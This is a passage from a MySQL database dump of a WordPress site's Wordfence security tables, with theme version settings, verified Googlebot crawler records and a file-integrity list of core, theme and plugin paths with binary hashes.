;s:6:\"hitmag\";s:5:\"1.0.9\";s:9:\"lovecraft\";s:4:\"1.17\";s:14:\"metro-magazine\";s:5:\"1.0.6\";s:9:\"monograph\";s:5:\"1.4.1\";s:7:\"newsmag\";s:5:\"2.1.6\";s:9:\"quicksand\";s:5:\"0.6.9\";s:11:\"saybusiness\";s:5:\"1.1.4\";s:11:\"simpleshift\";s:5:\"1.0.9\";s:11:\"singularity\";s:5:\"1.0.9\";s:11:\"skt-pathway\";s:3:\"1.6\";s:8:\"the-best\";s:5:\"1.0.9\";s:14:\"twentynineteen\";s:3:\"2.0\";s:12:\"twentytwenty\";s:3:\"1.7\";s:15:\"twentytwentyone\";s:3:\"1.3\";s:14:\"university-hub\";s:5:\"1.0.4\";s:6:\"weblog\";s:5:\"1.0.1\";s:9:\"wp-simple\";s:5:\"2.1.0\";}','yes'),('wordpressVersion','5.7.2','yes'),('wp_home_url','https://www.equalitywalk.org.uk','yes'),('wp_site_url','https://www.equalitywalk.org.uk','yes');
/*!40000 ALTER TABLE `wp_wfconfig` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfcrawlers`
--

DROP TABLE IF EXISTS `wp_wfcrawlers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfcrawlers` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `patternSig` binary(16) NOT NULL,
  `status` char(8) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  `PTR` varchar(255) DEFAULT '',
  PRIMARY KEY (`IP`,`patternSig`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfcrawlers`
--

LOCK TABLES `wp_wfcrawlers` WRITE;
/*!40000 ALTER TABLE `wp_wfcrawlers` DISABLE KEYS */;
INSERT INTO `wp_wfcrawlers` VALUES ('\0\0\0\0\0\0\0\0\0\0��B�@i','�����>�b0�oQ1��','verified',1629337883,'crawl-66-249-64-105.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@u','�����>�b0�oQ1��','verified',1629290266,'crawl-66-249-64-117.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@w','�����>�b0�oQ1��','verified',1629290267,'crawl-66-249-64-119.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@y','�����>�b0�oQ1��','verified',1629291342,'crawl-66-249-64-121.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�@�','�����>�b0�oQ1��','verified',1629577785,'crawl-66-249-64-205.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1629753199,'crawl-66-249-66-4.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1629752071,'crawl-66-249-66-6.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1629745812,'crawl-66-249-66-8.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B\n','�����>�b0�oQ1��','verified',1629759268,'crawl-66-249-66-10.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1629791145,'crawl-66-249-66-12.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1629634493,'crawl-66-249-66-20.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1629634202,'crawl-66-249-66-22.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B','�����>�b0�oQ1��','verified',1629634494,'crawl-66-249-66-24.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B\Z','�����>�b0�oQ1��','verified',1629746559,'crawl-66-249-66-26.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B�','�����>�b0�oQ1��','verified',1629748904,'crawl-66-249-66-211.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�B�','�����>�b0�oQ1��','verified',1629240131,'crawl-66-249-66-213.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�E�','�����>�b0�oQ1��','verified',1629835793,'crawl-66-249-69-148.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�E�','�����>�b0�oQ1��','verified',1629835793,'crawl-66-249-69-149.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�E�','�����>�b0�oQ1��','verified',1629801263,'crawl-66-249-69-151.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�E�','�����>�b0�oQ1��','verified',1629801254,'crawl-66-249-69-152.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�E�','�����>�b0�oQ1��','verified',1629803532,'crawl-66-249-69-153.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Lt','�����>�b0�oQ1��','verified',1629463525,'crawl-66-249-76-116.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Lu','�����>�b0�oQ1��','verified',1629465674,'crawl-66-249-76-117.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��B�Lv','�����>�b0�oQ1��','verified',1629466671,'crawl-66-249-76-118.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0��k��','i��| ��OoD!���','verified',1629609640,''),('\0\0\0\0\0\0\0\0\0\0��k��','�����>�b0�oQ1��','badPTR',1629609639,'24.194.178.107.gae.googleusercontent.com'),('\0\0\0\0\0\0\0\0\0\0��k��','i��| ��OoD!���','verified',1629609640,''),('\0\0\0\0\0\0\0\0\0\0��k��','�����>�b0�oQ1��','badPTR',1629609639,'25.194.178.107.gae.googleusercontent.com'),('\0\0\0\0\0\0\0\0\0\0����a','i��| ��OoD!���','verified',1629209471,''),('\0\0\0\0\0\0\0\0\0\0����a','�����>�b0�oQ1��','badPTR',1629209470,'209.250.254.97.vultr.com');
/*!40000 ALTER TABLE `wp_wfcrawlers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilechanges`
--

DROP TABLE IF EXISTS `wp_wffilechanges`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilechanges` (
  `filenameHash` char(64) NOT NULL,
  `file` varchar(1000) NOT NULL,
  `md5` char(32) NOT NULL,
  PRIMARY KEY (`filenameHash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilechanges`
--

LOCK TABLES `wp_wffilechanges` WRITE;
/*!40000 ALTER TABLE `wp_wffilechanges` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wffilechanges` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wffilemods`
--

DROP TABLE IF EXISTS `wp_wffilemods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wffilemods` (
  `filenameMD5` binary(16) NOT NULL,
  `filename` varchar(1000) NOT NULL,
  `knownFile` tinyint(3) unsigned NOT NULL,
  `oldMD5` binary(16) NOT NULL,
  `newMD5` binary(16) NOT NULL,
  `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '',
  `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0,
  `isSafeFile` varchar(1) NOT NULL DEFAULT '?',
  PRIMARY KEY (`filenameMD5`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wffilemods`
--

LOCK TABLES `wp_wffilemods` WRITE;
/*!40000 ALTER TABLE `wp_wffilemods` DISABLE KEYS */;
INSERT INTO `wp_wffilemods` VALUES ('\0\\Q����i��Z�','wp-content/themes/newsmag/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G?+D����8�Q��','��!Ga��L�1R��]G������3Š��oE[','',0,'?'),('\0�X~��V��?;�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���t�ݜ�\0JM�i','ɭ�K�����b$z_r$��x	���>D����','',0,'?'),('\0�4g�{�����X','wp-content/themes/edge/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1R���7*����J','�1��y���V� 6�g�f� �Ukl%�00','',0,'?'),('\0?H�\0�E}�����\"�','wp-includes/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('\0)4\nTY��d4G~�','wp-includes/images/w-logo-blue-white-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('\0.KQ%��<�t�99','wp-content/themes/city-store/assets/js/source/jquery.cycle.all.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dڜ�[��i��\Z^�','�[>KiS�����Ha���K�I�cBJ�m���ˍ��','',0,'?'),('\00��#�9���Z4�j$','wp-admin/network/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�d4VڋS~tɱ�ź','�o�ᕑ�\"t�y�S�����M8�!9/�?Y�X�','',0,'?'),('\01.^��7W�ج8U�(','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/3024-night.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�9��=��~��Oɴ','P�H�v�s�(��w����8x��u��','',0,'?'),('\05g���꫔c�0�\"D','wp-includes/css/media-views-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��M]�1f�D,��>�','�mA �7N�/z}��;��e��r�cs�#sW','',0,'?'),('\08iy�H`��\0v�|��','wp-content/themes/graphene/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','51�Y�<�=!]�_X�','������0�%�\"�J�/�p2�܁��I��','',0,'?'),('\08�<lc�ˊ�gg)9�','wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^��L��U�\n��i�','%LIf͕�}��Y�9���&yH��2nh','',0,'?'),('\0C_\n��jD��@k','wp-admin/network/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�)��&�c���','1�t/g�7O�$�U~�4n7�Z\Z�;u��)�dk��n','',0,'?'),('\0G���M(��YlWz�!','wp-includes/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pZ�����:!�ټ�','3�l�@���o�-�3���S���Տ&�!��','',0,'?'),('\0`Y�ϭrG����','wp-includes/SimplePie/Restriction.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[\"��~\'���$|2*�','�>�3�	vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('\0iv���=�ͩ�-','wp-content/themes/education-hub/template-parts/home-news-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�/YXȬ�8��','��ݶ	�؋\ZpƓ���!�o�k�9C�,��j��F�','',0,'?'),('\0mA}=��I#���o�','wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�B�9����Ǭ�','Γ�&[��f��&�\'��8���I,�A��','',0,'?'),('\0���;f��Q�=*Ǖ�','wp-includes/js/wp-emoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����׶H;�q.�','�������O��)`5g�D?5F�!����','',0,'?'),('\0�9�k5&�ٙ 7N','wp-includes/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�kݢA��D�5z�yj','BQ�e!�R�il��s�nq��R41x�x�Q!','',0,'?'),('\0�^���ַ��k�N�z','wp-content/themes/city-store/assets/js/slick.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@O�Ld<�t�E�M','8�vJ�]N��F��\"��V�>�9PV\'�R2���	','',0,'?'),('\0�G���As�7.��.�V','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��޻�T�����}2�','�̖�^)�VX����|���p�OS]��~h�','',0,'?'),('\0�V�TĎ>�o�KeL�','wp-content/themes/brickyard/functions/about/images/arrow_right_expanda.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�غY&%�$W�%4K','��f.�y27T���1p�dG��Z���r0�]�','',0,'?'),('\0��C$�\\.��:���','wp-content/themes/newsmag/assets/sass/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���H�L��(���','�66���M��\'	\0�,�8C>Ɓ�\"��~�fd','',0,'?'),('\0�|9��u�e���@��','wp-admin/includes/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��)�\\�w�s����}\0','�9)�>�[	�\0b|�WC����L���#�+�','',0,'?'),('\0��e�	W�(��cMm�','wp-content/themes/singularity/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NnJ[�]%B\'�a���[','sr{�����=1>h���Y��aӑu���s%��','',0,'?'),('\0�6\rAG�Qkh�>V�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2f @��\rs�؁R','@��GI��;�X!ë\Z]Zϯ����)e�Fg��','',0,'?'),('\0�D�`�8R��ɲ%��','wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��`i���y��','���Tܯ����19^�ջ�P\'�L�d%�k|�P؞','',0,'?'),('\0���|�a���o�','wp-content/themes/wp-simple/inc/pro/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D�N�\n*����/��','�\n�Vb>t�\"h<��Of����r��Ɔ_Hb{','',0,'?'),('\0۷\'au/!z������k','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/comment/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �T�m☴s����z','���37\ZZu&��G#̨\'��5:�H���e<�','',0,'?'),('\0�lDd��u^��Y��','wp-admin/user/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�I���U{x1�A','F��u�X\0�og�:~��h��_��5��p�t�$','',0,'?'),('\0��f\ZxŖ���K�','wp-content/themes/weblog/acmethemes/customizer/feature-section/feature-enable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�]dGu�\0)Ud}�X�',',d�h�xY⃪d�g��>W�\nnOB��1��x&','',0,'?'),('\0�����6�uY���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�׌�/��IR','f�?���(��m�������Zn�ҳ���h;ފ','',0,'?'),('\0��	y�Z�^��|','wp-content/themes/catch-flames/images/catch-themes-themes-option.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rrG�́\r~��V��o','���oj�S��P\ZW\"\Ze��U�޽|��f�Y��@l','',0,'?'),('\0� $���ә\0֫','wp-includes/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'׊�@~w\0�5','1���lmb����E�W\0�34,F˯֠�Q','',0,'?'),('\rx+�U��ڜ���','wp-includes/css/dist/list-reusable-blocks/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���6JҨNM!d��$t','E��|���K4�g�,��_��^��,��	Ev�','',0,'?'),('\nk����K�[΄','wp-content/themes/saybusiness/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�@f�lۅ��X č�','[�Ny��H $JCғрM\rm��A��/8�}�','',0,'?'),('1�ha�9g�>����B�','wp-content/themes/monograph/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2zrT5R66�����',')�m�fCzK��;-�a]\rm�<a���','',0,'?'),('7g��}!u��I��','wp-content/themes/education-hub/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D3D��e|�7R��C','��R�_.*Y��\r���!��(�N��!��/�H','',0,'?'),('Au�,����kTA','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/twig/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�7gR9)\Z<{O�','ʢ��PU��R.�(�8�mр�֟-�����\n-b','',0,'?'),('G���]��','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/dashicons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r/\Z�5��S������','�G��\"�]icsҺ���҂�ڒ�(���','',0,'?'),('NDj^:uT�>B�*��','wp-content/plugins/wordfence/css/main.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8/�_NN���7�','pE(���4,�G�i�:��UML�k5�Y��','',0,'?'),('NQ�\"*hz�r�w|\Z�','wp-admin/images/media-button-other.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q&T^�]BB�g\'��','��B\Z�r�F�В���Pv-^fT�,�_��i','',0,'?'),('O�9�6��6�_s��','wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��C�:fw��z�U�',' ��TW��&D2eeJ!����bq�\"�w�*�ߔ>�','',0,'?'),('X�ɘy_�7�XN/','wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\Z��.*:î�+�1','��\Z���ޔ�eg�)��QRC��A�m����','',0,'?'),(']��j��R���X','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��//R�����j���.','��3\'�X\r�o�`/��D����/�3\Z','',0,'?'),('e���ou�;~\Z-7]','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/datetime.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}9�DF�(+W��v','iـCr���/c��{��n\'c}�����W�M�','',0,'?'),('}K&�(t�-0W�Of�e','wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��+utN�pOQ ','wp-content/themes/exoplanet/page-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�d^E;\0��','��+�\Z�^�c˅\'��Ʊ.=��mŭ�Mb�M�','',0,'?'),('�m!U߄���U','wp-content/plugins/wp-cerber/assets/flags/bz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�����ڜ�','�0^k R�e�����q��C���G���Q\"��','',0,'?'),('�T�h���zP��r�','wp-admin/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iz��k”���$]�','��\'MLJ)�ֺma� �fq�JK�-����Ȧ�','',0,'?'),('�ϋД\'Ot�ʗM;','wp-includes/js/dist/deprecated.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�\\O���d�#��s�u','�`<�`qn�̀��\"�`�*���t�����y�','',0,'?'),('�h�&ߟf�¡X��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/panels/class-kirki-panels-default-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �x딱]�S�jp�','�o�xSY���sg�`Ȅ� \"��r6Z��V, C�','',0,'?'),('Ņ��p��{;VO^�Y7','wp-content/themes/advance/images/blank1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����PϢ}�)�#�','c�������>�?�QYY�NZr��\"��^G<��[','',0,'?'),('�X|_��wc�:�j��','wp-includes/blocks/search/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�虚-�.�\Z��2	�','޻O�ͯ�G�2�\n�ɣ~�V��\Z6��|x','',0,'?'),('ׯ���\'��YNq�','wp-content/themes/the-best/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b,�R��Q��\"�','w%���NS��^����ӻ��H��U���7','',0,'?'),('�i���`^��AC/zY','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/isotope.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"YB�i:�t]I\ro�','[^|��Z5�\n#Y���;��M�y]h�m','',0,'?'),('��E?tB9b��vF`1','wp-content/plugins/wordfence/modules/login-security/img/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�2��p\nK�X��','�Ύ%X�ŖF�����1s�;��L�zr璻','',0,'?'),('�pPZ�/�]{�~{�$D','wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�W]c\'\rd�`','����$�6�`�|��y+�^	8c%���k�','',0,'?'),('��u������','wp-content/themes/monograph/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f;.Y�|��k��n����','�Lm�$!?����X��2�-��(9Tč�','',0,'?'),('��4��14�mgm�(�','wp-content/themes/chronus/inc/theme-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ұ�L�1�>$��','eB�jd��M6}38>��=:`O��ԻD�Q��','',0,'?'),('3����S�����','wp-content/themes/wp-simple/inc/kirki/tests/test-kirki-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�!V4pWB�_\n�','�*%İ�8��c9�#G2i�����C3tvo��','',0,'?'),('t]�ٟu��u��j�','wp-admin/images/menu-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���L�,_�;1/�E�','G�iH|��)��E;��\"_�;ԣ4Իw�ly�','',0,'?'),('��~�w`�5;F㮮','wp-includes/js/jquery/ui/effect-size.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t(������D','�[�9E�3%��4�F�9��:�uØ�~j9�','',0,'?'),('�=��q�\rljA+','wp-admin/user/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<D\0�\n#���E����','X�x�no�{\0���\\��䞿��e[��jZN','',0,'?'),('\n�s�|�y��s]','wp-content/themes/authorize/components/navigation/navigation-top.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�1�p���\Zސ�P','����>R�-��\\š�Ԩq���G�:�!�1��#��','',0,'?'),('�n���Xi;�@b��','wp-content/themes/city-store/assets/js/source/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C!^!^hT-�I)D.e','d0=E�v.�X�o�o]Vv xx\0G#s�\'���','',0,'?'),('\'�5�ur߲���m','wp-content/plugins/wp-cerber/cerber-whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m���D�pM����Q�','t<e��F/�+�A�8�_�D\Z�����[��jg','',0,'?'),('*��26���1DI;܌','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/mode/haml/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̽�@)��j�����','Ǒ�(8�y[��8w�����O��8$\"�����','',0,'?'),('<)8T*.�SuS�ĺ�','wp-includes/SimplePie/Cache/MySQL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�) ��fz���C�0�','	��W��A��2Lh�`���i�%iv�2���޴','',0,'?'),('?�◬9-�`��;�','wp-content/themes/newsmag/assets/vendors/owl-carousel/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mݕ�8��1��\'','c�(�L�#f�����~�1:J9�	f��x��','',0,'?'),('F=+�IiK�Z��*','wp-content/themes/advance/inc/kirki/assets/js/functions/set-setting-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m���_�n|��RU��','w��vri����\n��`�4!���!��tx��S','',0,'?'),('HC���!���\"(�','wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('J�\rӷG>�����','wp-includes/class-walker-page-dropdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tB�B2�[eJ��5�a','Y�Ds4��I<����A�t�ȃ���\Z��G���.','',0,'?'),('M�\\\0���p��QV�','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Puē���P��7�','Y�´���(��sK�{�!��J���j0�M�m���','',0,'?'),('TM��:ݫ�&ͺ#�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/code.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#3]r,AzF�l�','Z�Qs��[��{�\\?�p�t֑]|���U-�e','',0,'?'),('`b��n��E��,','wp-content/themes/advance/inc/kirki/assets/js/vendor/tinymce.plugin.code.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�믭�8�h�@@�','Z���\n����Km���}-��7��z��\"t	k','',0,'?'),('g��(��A�Oѡ1��','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U!#u��TD��5l}','��Hu�r�S��!�㒦\r�r��E��b����','',0,'?'),('q�{JQ���c#S��','wp-content/themes/advance/inc/kirki/assets/images/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̯nj��h�\'Y�','���g:�s�\'\\���9S����>,�d[�e&u���','',0,'?'),('u��s��y6\'v,��=','wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('yә��w_��	��\"�','wp-content/themes/Kent/content-page.php',0,'%AT+�O�e�$VL6�k�','%AT+�O�e�$VL6�k�','��������eHQ���\Zu{���>�>�5~[z�','',0,'?'),('�\"�qUy���9�%Q�','wp-includes/class-wp-matchesmapregex.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('����c\rT���,��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/color.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��蔿�n����g���','JG*��r\0�df� >}�����\\�^��N','',0,'?'),('���L��Lu@�p�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�� .*�XI��','{Yw�B��S�g�m9��2���,��|�D��aq�','',0,'?'),('�����ࣺE\0�堌','wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!��N8�j��','o�t0�\r�P2��N�����i���K��u���','',0,'?'),('�,�)v9�m����','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/rubyblue.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�T��yE����@d�J','�ߗ����}i����*y�hս9e:�By�	��','',0,'?'),('�\"��.}}X��1�\Z�','wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���+�6�e�A�','�����K�j�ij�q�2�i���c^%ܓK�O?','',0,'?'),('��h��B�,��!�e','wp-content/themes/Kent/aq_resizer.php',0,'ob�t��N�1qg','ob�t��N�1qg','Q6������O�&[쮀ʵ��j���@���?V','',0,'?'),('�Q��S$Wm�=D��','wp-content/themes/wp-simple/assets/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M+�#\'3�8�{��~B','O�Zxk�ް ˲�yQ*c���L���x\Z�D�(	�','',0,'?'),('���,�rq�m����o','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ù[�T�����r','�Z�\\U��`��c5��L\r[�s�y���}}','',0,'?'),('� ����K 